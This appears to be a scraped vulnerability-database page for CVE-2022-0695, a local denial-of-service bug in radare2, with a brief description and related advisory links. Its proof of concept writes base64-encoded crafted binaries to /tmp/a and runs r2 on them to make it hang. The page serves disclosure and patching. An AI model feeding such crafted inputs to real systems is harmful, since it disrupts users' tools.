Lucene search
WtdcodeBDBDDC0E-FB06-4211-A90B-7CBEDCEE2BEAHistoryFeb 23, 2022 - 10:19 p.m.
Denial of Service
2022-02-2322:19:03
wtdcode
www.huntr.dev
9
0.001 Low
EPSS
Percentile
44.7%
Description
R2 will hang for several crafted binaries.
Proof of Concept
printf "%s" "AAA4AAAAAB4=" | base64 -d > /tmp/a
# printf "%s" "z/rt/gwAAAEuAAB//wAAAACe2QEaAAAG+s8yAOH/AQAAAA==" | base64 -d > /tmp/a
# printf "%s" "zvrt/gCd7QBMYWT6AAD6/2NiQGsOAAGbuAAAADQAAID7AAAAAAEAAAEBZWUgcmR4LCByY3gBHQAAABEAAAAB/wAA7wABAAFiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiY2JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJi/3///2KdYmJidmJiZc767QIA/38BAAr/7n/WAc767QAAAgD2AB0AABAFAAAVAQAAAAHv7+/v7+/v7+/v729jYWwvc2hhcmUvcmFkYXJlMi9wZGJ4QAAAAAQAAAEBYmVxPwCQHckEAAAAANBEyQR6ABQAkETJBAAAAAAhAAAAAAIAAAAQAAIAAAAQEAAAEgAAAAEAAABlYXhAKysBAA==" | base64 -d > /tmp/a
r2 /tmp/a # This hangs forever.
Impact
This vulnerability is capable of denial of service locally.
Related
prion
prion
Denial of service
2022-02-24 13:15:00
cvelist
cvelist
CVE-2022-0695 Denial of Service in radareorg/radare2
2022-02-24 12:25:10
alpinelinux
alpinelinux
CVE-2022-0695
2022-02-24 13:15:07
osv
osv
CVE-2022-0695
2022-02-24 13:15:07
cve
cve
CVE-2022-0695
2022-02-24 13:15:07
debiancve
debiancve
CVE-2022-0695
2022-02-24 13:15:07
ubuntucve
ubuntucve
CVE-2022-0695
2022-02-24 00:00:00
veracode
veracode
Denial Of Service (DoS)
2022-12-25 06:51:46
nvd
nvd
CVE-2022-0695
2022-02-24 13:15:07
openvas
openvas
Fedora: Security Advisory for radare2 (FEDORA-2022-7db9e7bb5b)
2022-03-23 00:00:00
Fedora: Security Advisory for radare2 (FEDORA-2022-85b277e748)
2022-03-27 00:00:00
Mageia: Security Advisory (MGASA-2022-0440)
2022-11-28 00:00:00
fedora
fedora
[SECURITY] Fedora 35 Update: radare2-5.6.4-1.fc35
2022-03-11 14:47:54
[SECURITY] Fedora 36 Update: radare2-5.6.4-1.fc36
2022-03-26 15:39:36
mageia
mageia
Updated radare2/rizin packages fix security vulnerability
2022-11-27 23:51:49